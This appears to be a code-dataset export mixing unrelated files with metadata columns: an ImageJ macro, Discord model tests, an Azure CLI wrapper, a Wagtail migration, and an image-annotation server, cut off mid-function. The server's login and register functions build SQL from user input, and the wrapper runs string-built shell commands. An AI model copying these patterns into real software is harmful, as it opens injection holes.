# run("Grid/Collection stitching", "type=[Grid: row-by-row] order=[Right & Down ] grid_size_x=2 grid_size_y=2 tile_overlap=10 first_file_index_i=0 directory=" + inputdir " file_names=" + slc + "_m{iii}.tif output_textfile_name=" + slc + "_TileConfiguration.txt fusion_method=[Linear Blending] regression_threshold=0.30 max/avg_displacement_threshold=2.50 absolute_displacement_threshold=3.50 compute_overlap subpixel_accuracy computation_parameters=[Save computation time (but use more RAM)] image_output=[Fuse and display]);
# saveAs("Tiff", outputdir + slc + "_fused.tif");
| 108.538462
| 544
| 0.779589
| 222
| 1,411
| 4.698198
| 0.396396
| 0.049856
| 0.072867
| 0.084372
| 0.803452
| 0.755513
| 0.707574
| 0.707574
| 0.707574
| 0.644295
| 0
| 0.04549
| 0.096386
| 1,411
| 12
| 545
| 117.583333
| 0.772549
| 0.415308
| 0
| 0
| 0
| 0.142857
| 0.838002
| 0.518879
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
52321c089e9dd3f1bb7119e916016ebb1db0224e
| 129
|
py
|
Python
|
wsgi.py
|
mzaglia/inpe_catalog
|
33d6d39df584923bcaf6f4d0dada8dbe4f08e147
|
[
"MIT"
] | null | null | null |
wsgi.py
|
mzaglia/inpe_catalog
|
33d6d39df584923bcaf6f4d0dada8dbe4f08e147
|
[
"MIT"
] | 4
|
2018-09-13T16:10:00.000Z
|
2018-09-25T15:00:47.000Z
|
wsgi.py
|
mzaglia/inpe_catalog
|
33d6d39df584923bcaf6f4d0dada8dbe4f08e147
|
[
"MIT"
] | 1
|
2018-07-26T17:18:35.000Z
|
2018-07-26T17:18:35.000Z
|
import os
from catalog import app
app.run(debug=True, host=os.environ.get('CATALOG_HOST'), port=os.environ.get('CATALOG_PORT'))
| 25.8
| 93
| 0.767442
| 22
| 129
| 4.409091
| 0.545455
| 0.185567
| 0.247423
| 0.391753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077519
| 129
| 4
| 94
| 32.25
| 0.815126
| 0
| 0
| 0
| 0
| 0
| 0.186047
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
526982b1c66fa86f7e157526cee329a014e8de74
| 3,741
|
py
|
Python
|
tests/test_models.py
|
Squidtoon99/dispike
|
db4b1a12268afcc87a96003923e6f56139872f0e
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
Squidtoon99/dispike
|
db4b1a12268afcc87a96003923e6f56139872f0e
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
Squidtoon99/dispike
|
db4b1a12268afcc87a96003923e6f56139872f0e
|
[
"MIT"
] | null | null | null |
from dispike.models import *
import pytest
def test_valid_incoming_one_option():
data = {
"channel_id": "123123",
"data": {
"id": "12312312",
"name": "sendmessage",
"options": [{"name": "message", "value": "test"}],
},
"guild_id": "123123",
"id": "123123123132",
"member": {
"deaf": False,
"is_pending": False,
"joined_at": "2019-05-12T18:36:16.878000+00:00",
"mute": False,
"nick": None,
"pending": False,
"permissions": "2147483647",
"premium_since": None,
"roles": [
"123123",
"123123",
"1231233",
"1231233133",
"12412412414",
],
"user": {
"avatar": "b723979992a56",
"discriminator": "3333",
"id": "234234213122123",
"public_flags": 768,
"username": "exo",
},
},
"token": "Null",
"type": 2,
"version": 1,
}
_create_model = IncomingDiscordInteraction(**data)
assert len(_create_model.data.options) == 1
def test_valid_incoming_multiple_options():
data = {
"channel_id": "123123",
"data": {
"id": "12312312",
"name": "sendmessage",
"options": [
{"name": "message", "value": "test"},
{"name": "message2", "value": "test2"},
],
},
"guild_id": "123123",
"id": "123123123132",
"member": {
"deaf": False,
"is_pending": False,
"joined_at": "2019-05-12T18:36:16.878000+00:00",
"mute": False,
"nick": None,
"pending": False,
"permissions": "2147483647",
"premium_since": None,
"roles": [
"123123",
"123123",
"1231233",
"1231233133",
"12412412414",
],
"user": {
"avatar": "b723979992a56",
"discriminator": "3333",
"id": "234234213122123",
"public_flags": 768,
"username": "exo",
},
},
"token": "Null",
"type": 2,
"version": 1,
}
_create_model = IncomingDiscordInteraction(**data)
assert len(_create_model.data.options) == 2
def test_valid_interaction_name():
data = {
"channel_id": "123123",
"data": {
"id": "12312312",
"name": "sendmessage",
"options": [{"name": "message", "value": "test"}],
},
"guild_id": "123123",
"id": "123123123132",
"member": {
"deaf": False,
"is_pending": False,
"joined_at": "2019-05-12T18:36:16.878000+00:00",
"mute": False,
"nick": None,
"pending": False,
"permissions": "2147483647",
"premium_since": None,
"roles": [
"123123",
"123123",
"1231233",
"1231233133",
"12412412414",
],
"user": {
"avatar": "b723979992a56",
"discriminator": "3333",
"id": "234234213122123",
"public_flags": 768,
"username": "exo",
},
},
"token": "Null",
"type": 2,
"version": 1,
}
_created_object = IncomingDiscordInteraction(**data)
assert _created_object.data.name == "sendmessage"
| 28.340909
| 62
| 0.41513
| 269
| 3,741
| 5.620818
| 0.282528
| 0.031746
| 0.02381
| 0.037698
| 0.847222
| 0.847222
| 0.847222
| 0.847222
| 0.847222
| 0.847222
| 0
| 0.199533
| 0.42796
| 3,741
| 131
| 63
| 28.557252
| 0.507009
| 0
| 0
| 0.808
| 0
| 0
| 0.293504
| 0.025662
| 0
| 0
| 0
| 0
| 0.024
| 1
| 0.024
| false
| 0
| 0.016
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5278f00de44639f802a1c375c893306cf8471e47
| 2,363
|
py
|
Python
|
test/pyaz/resource/link/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/resource/link/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/resource/link/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from ... pyaz_utils import get_cli_name, get_params
def create(link, target, notes=None):
params = get_params(locals())
command = "az resource link create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(link):
params = get_params(locals())
command = "az resource link delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(link):
params = get_params(locals())
command = "az resource link show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list(scope=None, filter=None):
params = get_params(locals())
command = "az resource link list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def update(link, target=None, notes=None):
params = get_params(locals())
command = "az resource link update " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 31.932432
| 96
| 0.648752
| 287
| 2,363
| 5.310105
| 0.149826
| 0.091864
| 0.065617
| 0.068898
| 0.900262
| 0.900262
| 0.900262
| 0.900262
| 0.900262
| 0.809711
| 0
| 0.005516
| 0.232755
| 2,363
| 73
| 97
| 32.369863
| 0.83508
| 0
| 0
| 0.820896
| 0
| 0
| 0.07025
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074627
| false
| 0
| 0.029851
| 0
| 0.179104
| 0.223881
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
528c5ddaa1d8deb4de4e818522c557a73259fb79
| 226
|
py
|
Python
|
ml_privacy_meter/utils/__init__.py
|
mihirkhandekar/ml_privacy_meter
|
c8efa4b444a7908783cf83acc2a0270113dc2356
|
[
"MIT"
] | null | null | null |
ml_privacy_meter/utils/__init__.py
|
mihirkhandekar/ml_privacy_meter
|
c8efa4b444a7908783cf83acc2a0270113dc2356
|
[
"MIT"
] | null | null | null |
ml_privacy_meter/utils/__init__.py
|
mihirkhandekar/ml_privacy_meter
|
c8efa4b444a7908783cf83acc2a0270113dc2356
|
[
"MIT"
] | null | null | null |
from ml_privacy_meter.utils import optimizers
from ml_privacy_meter.utils import losses
from ml_privacy_meter.utils import logger
from ml_privacy_meter.utils import attack_data
from ml_privacy_meter.utils import attack_utils
| 32.285714
| 47
| 0.884956
| 37
| 226
| 5.081081
| 0.297297
| 0.159574
| 0.345745
| 0.478723
| 0.835106
| 0.835106
| 0.37234
| 0
| 0
| 0
| 0
| 0
| 0.09292
| 226
| 7
| 47
| 32.285714
| 0.917073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
875fdb1866c2bb0bd365f526d91476c464170c00
| 6,203
|
py
|
Python
|
cfgov/v1/migrations/0144_rm_hero_links.py
|
higs4281/cfgov-refresh
|
a02b193fb2373d443265c21845adf8a196e05675
|
[
"CC0-1.0"
] | 1
|
2019-11-26T20:18:22.000Z
|
2019-11-26T20:18:22.000Z
|
cfgov/v1/migrations/0144_rm_hero_links.py
|
higs4281/cfgov-refresh
|
a02b193fb2373d443265c21845adf8a196e05675
|
[
"CC0-1.0"
] | 8
|
2021-03-11T00:55:51.000Z
|
2022-02-13T21:10:14.000Z
|
cfgov/v1/migrations/0144_rm_hero_links.py
|
higs4281/cfgov-refresh
|
a02b193fb2373d443265c21845adf8a196e05675
|
[
"CC0-1.0"
] | 1
|
2019-12-28T14:04:07.000Z
|
2019-12-28T14:04:07.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-03-05 18:45
from __future__ import unicode_literals
from django.db import migrations
import wagtail.wagtailcore.blocks
import wagtail.wagtailcore.fields
import wagtail.wagtailimages.blocks
class Migration(migrations.Migration):
    # Auto-generated by Django 1.11.20 on 2019-03-05 (see file header).
    # Redefines the 'header' StreamField on three page types so the hero
    # StructBlock no longer carries the removed 'links' child block
    # (cf. migration name: 0144_rm_hero_links).
    # NOTE: generated code — do not hand-edit the block definitions below;
    # regenerate with `makemigrations` instead.

    # Must run after the form-field-with-button removal migration.
    dependencies = [
        ('v1', '0143_rm_formfieldwithbutton'),
    ]

    operations = [
        migrations.AlterField(
            model_name='landingpage',
            name='header',
            field=wagtail.wagtailcore.fields.StreamField([(b'hero', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Maximum character count: 25 (including spaces)', required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(help_text=b'Maximum character count: 185 (including spaces)', required=False)), (b'background_color', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Specify a hex value (with the # sign) from our official palette: https://github.com/cfpb/cf-theme-cfpb/blob/master/src/color-palette.less', required=False)), (b'is_white_text', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Turns the hero text white. Useful if using a dark background color or background image.', required=False)), (b'image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Should be exactly 390px tall, and up to 940px wide, unless this is an overlay or bleeding style hero.', required=False)), (b'is_overlay', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to be a background image under the entire hero.', required=False)), (b'is_bleeding', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to bleed vertically off the top and bottom of the hero.', required=False)), (b'small_image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Provide an alternate image for small displays when using a bleeding or overlay hero.', required=False))])), (b'text_introduction', wagtail.wagtailcore.blocks.StructBlock([(b'eyebrow', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Optional: Adds an H5 eyebrow above H1 heading text. \nOnly use in conjunction with heading.', label=b'Pre-heading', required=False)), (b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'intro', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False)), (b'has_rule', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Check this to add a horizontal rule line to bottom of text introduction.', label=b'Has bottom rule', required=False))]))], blank=True),
        ),
        migrations.AlterField(
            model_name='sublandingfilterablepage',
            name='header',
            field=wagtail.wagtailcore.fields.StreamField([(b'hero', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Maximum character count: 25 (including spaces)', required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(help_text=b'Maximum character count: 185 (including spaces)', required=False)), (b'background_color', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Specify a hex value (with the # sign) from our official palette: https://github.com/cfpb/cf-theme-cfpb/blob/master/src/color-palette.less', required=False)), (b'is_white_text', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Turns the hero text white. Useful if using a dark background color or background image.', required=False)), (b'image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Should be exactly 390px tall, and up to 940px wide, unless this is an overlay or bleeding style hero.', required=False)), (b'is_overlay', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to be a background image under the entire hero.', required=False)), (b'is_bleeding', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to bleed vertically off the top and bottom of the hero.', required=False)), (b'small_image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Provide an alternate image for small displays when using a bleeding or overlay hero.', required=False))]))], blank=True),
        ),
        migrations.AlterField(
            model_name='sublandingpage',
            name='header',
            field=wagtail.wagtailcore.fields.StreamField([(b'hero', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Maximum character count: 25 (including spaces)', required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(help_text=b'Maximum character count: 185 (including spaces)', required=False)), (b'background_color', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Specify a hex value (with the # sign) from our official palette: https://github.com/cfpb/cf-theme-cfpb/blob/master/src/color-palette.less', required=False)), (b'is_white_text', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Turns the hero text white. Useful if using a dark background color or background image.', required=False)), (b'image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Should be exactly 390px tall, and up to 940px wide, unless this is an overlay or bleeding style hero.', required=False)), (b'is_overlay', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to be a background image under the entire hero.', required=False)), (b'is_bleeding', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Select if you want the provided image to bleed vertically off the top and bottom of the hero.', required=False)), (b'small_image', wagtail.wagtailimages.blocks.ImageChooserBlock(help_text=b'Provide an alternate image for small displays when using a bleeding or overlay hero.', required=False))]))], blank=True),
        ),
    ]
| 182.441176
| 2,425
| 0.770434
| 864
| 6,203
| 5.466435
| 0.179398
| 0.137201
| 0.162609
| 0.069871
| 0.854965
| 0.839721
| 0.838027
| 0.788905
| 0.760322
| 0.760322
| 0
| 0.010466
| 0.106561
| 6,203
| 33
| 2,426
| 187.969697
| 0.841754
| 0.011124
| 0
| 0.423077
| 1
| 0.230769
| 0.428478
| 0.008318
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.192308
| 0
| 0.307692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5e415d220d92e02d210bb32ac6bb18286e09279f
| 14,975
|
py
|
Python
|
system-server/function.py
|
xingximing-xxm/Image-Annotation-Correction-System
|
aeb5d3c556d30c855b8dfea61feeaf17d46ec135
|
[
"MIT"
] | null | null | null |
system-server/function.py
|
xingximing-xxm/Image-Annotation-Correction-System
|
aeb5d3c556d30c855b8dfea61feeaf17d46ec135
|
[
"MIT"
] | null | null | null |
system-server/function.py
|
xingximing-xxm/Image-Annotation-Correction-System
|
aeb5d3c556d30c855b8dfea61feeaf17d46ec135
|
[
"MIT"
] | null | null | null |
from nltk.corpus import wordnet
import torch
from tqdm import tqdm
from labeldic import label_dic
import json
from datetime import datetime
from multiprocessing import Lock
# One process-wide lock serialising access to the shared DB cursor.  The
# original created a fresh Lock() inside each call, which excluded nothing.
_DB_LOCK = Lock()


def login(cursor, data):
    """Authenticate the user in data['inf'] and build the session payload.

    Returns:
        (True, message, history, all_classes, {'datasets', 'dataSource'}, admin)
        on success, or (False, message, {'history': []}) on failure.
    """
    user = data['inf']
    with _DB_LOCK:
        # Parameterised query ('format' paramstyle, e.g. PyMySQL) — the
        # original %-interpolated the credentials and was SQL-injectable.
        cursor.execute(
            "select * from Users where username=%s and password=%s;",
            (user['username'], user['password']))
        result = cursor.fetchall()
    if len(result) == 1:
        # Read the row only after we know it exists; the original indexed
        # result[0] before this check and crashed on failed logins.
        history = result[0][2]
        admin = result[0][3]
        with _DB_LOCK:
            cursor.execute(
                "select upload, retrieve from Admin where admin = %s;",
                (admin,))
            result = cursor.fetchall()
            admin = {'upload': result[0][0], 'retrieve': result[0][1]}
        if data['dataset'] == 'ImageNet':
            # ImageNet labels come from the bundled dictionary, not the DB.
            all_classes = [label_dic[str(i)][0] for i in range(1000)]
        else:
            with _DB_LOCK:
                # Table names cannot be bound as parameters; data['dataset']
                # must be validated against a whitelist by the caller.
                cursor.execute(
                    "select label from %s_Label order by id asc;" % data['dataset'])
                all_classes = [row[0] for row in cursor.fetchall()]
        with _DB_LOCK:
            cursor.execute("select name, classes, number, is_c from Dataset;")
            datasets = []
            dataSource = []
            for item in cursor.fetchall():
                if item[3] == 1:
                    datasets.append(item[0])
                # NOTE(review): dump lost indentation — assumed dataSource
                # collects every row (is_c varies) while datasets is the
                # is_c == 1 subset; confirm against the frontend.
                dataSource.append({'dataset': item[0], 'classes': item[1],
                                   'number': item[2], 'is_c': item[3]})
        print(dataSource)
        return (True, "Log in successful.", history, all_classes,
                {'datasets': datasets, 'dataSource': dataSource}, admin)
    else:
        return False, "Username or password error.", {"history": []}
def register(cursor, data):
    """Create a new account unless data['username'] is already taken.

    Returns:
        (ok, message) — ok is False when the username exists.
    """
    # Parameterised query — the original %-interpolated the username/password
    # and was SQL-injectable.
    cursor.execute("select * from Users where username=%s;",
                   (data['username'],))
    result = cursor.fetchall()
    if len(result) > 0:
        return False, "The username has been registered."
    # New accounts start with an empty history and no admin rights (admin=0).
    cursor.execute(
        "insert into Users (username, password, history, admin) values(%s, %s, %s, 0);",
        (data['username'], data['password'], json.dumps({"history": []})))
    return True, "Registration successful."
def size(flag, item):
    """Return True when record *item* passes the size filter *flag*.

    item[4] holds the image size; 'all' accepts everything, 'large' is
    >= 1000, 'middle' is [800, 1000), anything else means "< 800".
    """
    if flag == 'all':
        return True
    pixels = item[4]
    if flag == 'large':
        return pixels >= 1000
    if flag == 'middle':
        return 800 <= pixels < 1000
    return pixels < 800
def date(flag, item):
    """Return True when record *item* passes the age filter *flag*.

    item[5] is a datetime; 'all' accepts everything, 'one'/'three' mean
    newer than 1/3 days, anything else means newer than 7 days.
    """
    if flag == 'all':
        return True
    age_days = (datetime.now() - item[5]).days
    if flag == 'one':
        return age_days < 1
    if flag == 'three':
        return age_days < 3
    return age_days < 7
def noisy(cursor, data):
    """List mislabelled images of data['dataset'] plus clean/noisy counts.

    Returns:
        (noisy_images, clean_num, noisy_num) where noisy_images is a list of
        {'path', 'noisy_label', 'clean_label', 'size'} dicts filtered by the
        size()/date() flags in *data*, ordered by ascending score.

    NOTE(review): the table name is %-interpolated into SQL, so
    data['dataset'] must come from a trusted whitelist upstream.
    """
    # The original duplicated the whole body per dataset; the only real
    # difference is how a numeric label index maps to display text.
    if data['dataset'] == 'ImageNet':
        def label_of(idx):
            return label_dic[str(idx)][0]
    else:
        cursor.execute("select label from %s_Label order by id asc;" % data['dataset'])
        all_classes = [row[0] for row in cursor.fetchall()]

        def label_of(idx):
            return all_classes[idx]
    noisy_images = []
    cursor.execute(
        "select path, noisy_label, clean_label, score, size, time from %s where noisy_label <> clean_label order by score asc;" %
        data['dataset'])
    for item in cursor.fetchall():
        if size(data['size'], item) and date(data['date'], item):
            noisy_images.append({'path': '/imgs' + item[0],
                                 'noisy_label': label_of(item[1]),
                                 'clean_label': label_of(item[2]),
                                 'size': item[4]})
    noisy_num = len(noisy_images)
    cursor.execute("select count(*) from %s where noisy_label = clean_label;" % data['dataset'])
    clean_num = cursor.fetchall()[0][0]
    return noisy_images, clean_num, noisy_num
def search_generic(cursor, data):
    """Fuzzy class search via WordNet path similarity.

    Splits data['search'] into words, resolves each to its first WordNet
    synset, scores every class of data['dataset'] by the mean path
    similarity between its name words and the query, and fetches
    clean/noisy images for every class scoring above 0.4.

    Returns:
        (clean_images, noisy_images, clean_num, noisy_num); all empty/0 when
        the query cannot be resolved or nothing matches.

    NOTE(review): the bare `except:` clauses below swallow everything
    (including KeyboardInterrupt) — presumably guarding WordNet lookup
    misses; consider narrowing.  The table name is %-interpolated into SQL,
    so data['dataset'] must be whitelisted upstream.
    """
    if data['dataset'] == 'ImageNet':
        # Per-class synonym lists; map each word to its first synset once.
        label_imagenet = torch.load('label/imagenet_label.dic')
        word_list = []
        for i in tqdm(range(len(label_imagenet))):
            word = {}
            for item in label_imagenet[i]:
                try:
                    word[item] = wordnet.synsets(item)[0]
                except:
                    continue  # word unknown to WordNet — skip it
            word_list.append(word)
        clean_images, noisy_images = [], []
        try:
            # Resolve each query token; bail out if any token is unknown.
            word_search = data['search'].split(' ')
            for i in range(len(word_search)):
                word_search[i] = wordnet.synsets(word_search[i])[0]
        except:
            return clean_images, noisy_images, 0, 0
        c = []
        # Score every class: mean similarity of its words vs the query words.
        for i in tqdm(range(len(label_imagenet))):
            s_all = 0
            s_len = len(label_imagenet[i])
            for item in label_imagenet[i]:
                try:
                    word = word_list[i][item]
                    similarity = 0
                    for j in range(len(word_search)):
                        similarity += word_search[j].path_similarity(word)
                    similarity = similarity / len(word_search)
                    s_all += similarity
                except:
                    s_len -= 1  # no synset / similarity undefined (None)
                    continue
            try:
                s_equal = s_all / s_len
                if s_equal > 0.4:  # similarity threshold for a class match
                    c.append(i)
            except:
                continue  # s_len == 0 — nothing comparable in this class
        if len(c) == 0:
            return clean_images, noisy_images, 0, 0
        else:
            # Correctly-labelled images of all matching classes, best first.
            result = []
            for item in c:
                cursor.execute(
                    "select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label = clean_label;" % (
                        data['dataset'], item))
                result += cursor.fetchall()
            result = sorted(result, key=lambda tup: tup[3], reverse=True)
            for item in result:
                if size(data['size'], item) and date(data['date'], item):
                    image = {'path': '/imgs' + item[0], 'label': label_dic[str(item[1])][0], 'size': item[4]}
                    clean_images.append(image)
            clean_num = len(clean_images)
            # Mislabelled images of the same classes, worst (lowest score) first.
            result = []
            for item in c:
                cursor.execute(
                    "select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label <> clean_label;" % (
                        data['dataset'],
                        item))
                result += cursor.fetchall()
            result = sorted(result, key=lambda tup: tup[3])
            for item in result:
                if size(data['size'], item) and date(data['date'], item):
                    image = {'path': '/imgs' + item[0], 'noisy_label': label_dic[str(item[1])][0],
                             'clean_label': label_dic[str(item[2])][0], 'size': item[4]}
                    noisy_images.append(image)
            noisy_num = len(noisy_images)
            for item in c:
                print(label_dic[str(item)][0])  # debug: matched class names
    else:
        cursor.execute("select label from %s_Label order by id asc;" % data['dataset'])
        all_classes = [item[0] for item in cursor.fetchall()]
        # Rebinds all_classes to per-class word LISTS for similarity scoring.
        # NOTE(review): the image dicts below therefore carry a list of words
        # as 'label'/'noisy_label' rather than the original class string —
        # looks like a copy-paste bug; confirm against the frontend.
        all_classes = [item.split(' ') for item in all_classes]
        word_list = []
        for i in tqdm(range(len(all_classes))):
            word = {}
            for item in all_classes[i]:
                try:
                    word[item] = wordnet.synsets(item)[0]
                except:
                    continue  # word unknown to WordNet — skip it
            word_list.append(word)
        clean_images, noisy_images = [], []
        try:
            word_search = data['search'].split(' ')
            for i in range(len(word_search)):
                word_search[i] = wordnet.synsets(word_search[i])[0]
        except:
            return clean_images, noisy_images, 0, 0
        c = []
        for i in tqdm(range(len(all_classes))):
            s_all = 0
            s_len = len(all_classes[i])
            for item in all_classes[i]:
                try:
                    word = word_list[i][item]
                    similarity = 0
                    for j in range(len(word_search)):
                        similarity += word_search[j].path_similarity(word)
                    similarity = similarity / len(word_search)
                    s_all += similarity
                except:
                    s_len -= 1  # no synset / similarity undefined (None)
                    continue
            try:
                s_equal = s_all / s_len
                if s_equal > 0.4:  # similarity threshold for a class match
                    c.append(i)
            except:
                continue  # s_len == 0 — nothing comparable in this class
        if len(c) == 0:
            return clean_images, noisy_images, 0, 0
        else:
            result = []
            for item in c:
                cursor.execute(
                    "select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label = clean_label;" % (
                        data['dataset'], item))
                result += cursor.fetchall()
            result = sorted(result, key=lambda tup: tup[3], reverse=True)
            for item in result:
                if size(data['size'], item) and date(data['date'], item):
                    image = {'path': '/imgs' + item[0], 'label': all_classes[item[1]], 'size': item[4]}
                    clean_images.append(image)
            clean_num = len(clean_images)
            result = []
            for item in c:
                cursor.execute(
                    "select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label <> clean_label;" % (
                        data['dataset'],
                        item))
                result += cursor.fetchall()
            result = sorted(result, key=lambda tup: tup[3])
            for item in result:
                if size(data['size'], item) and date(data['date'], item):
                    image = {'path': '/imgs' + item[0], 'noisy_label': all_classes[item[1]],
                             'clean_label': all_classes[item[2]], 'size': item[4]}
                    noisy_images.append(image)
            noisy_num = len(noisy_images)
            for item in c:
                # NOTE(review): uses the ImageNet label_dic on custom-dataset
                # indices — likely copy-paste from the branch above; may
                # KeyError or print unrelated names.
                print(label_dic[str(item)][0])
    return clean_images, noisy_images, clean_num, noisy_num
def search_accurate(cursor, data):
    """Exact class-name search: find the first class matching data['search']
    and fetch its clean/noisy images (filtered by size()/date() flags).

    Returns:
        (clean_images, noisy_images, clean_num, noisy_num); all empty/0 when
        no class matches.
    """
    clean_images, noisy_images = [], []
    search = data['search']
    # The original duplicated ~30 lines per dataset; the branches differed
    # only in how a class index is matched and how it is rendered as text.
    if data['dataset'] == 'ImageNet':
        total = len(label_dic)

        def matches(i):
            # ImageNet entries are synonym lists — membership test.
            return search in label_dic[str(i)]

        def label_of(idx):
            return label_dic[str(idx)][0]
    else:
        # NOTE(review): table name is %-interpolated; data['dataset'] must be
        # whitelisted upstream.  Class indices below are numeric (%d), safe.
        cursor.execute("select label from %s_Label order by id asc;" % data['dataset'])
        all_classes = [row[0] for row in cursor.fetchall()]
        total = len(all_classes)

        def matches(i):
            return search == all_classes[i]

        def label_of(idx):
            return all_classes[idx]
    c = -1
    for i in tqdm(range(total)):
        if matches(i):
            c = i
            break
    if c == -1:
        return clean_images, noisy_images, 0, 0
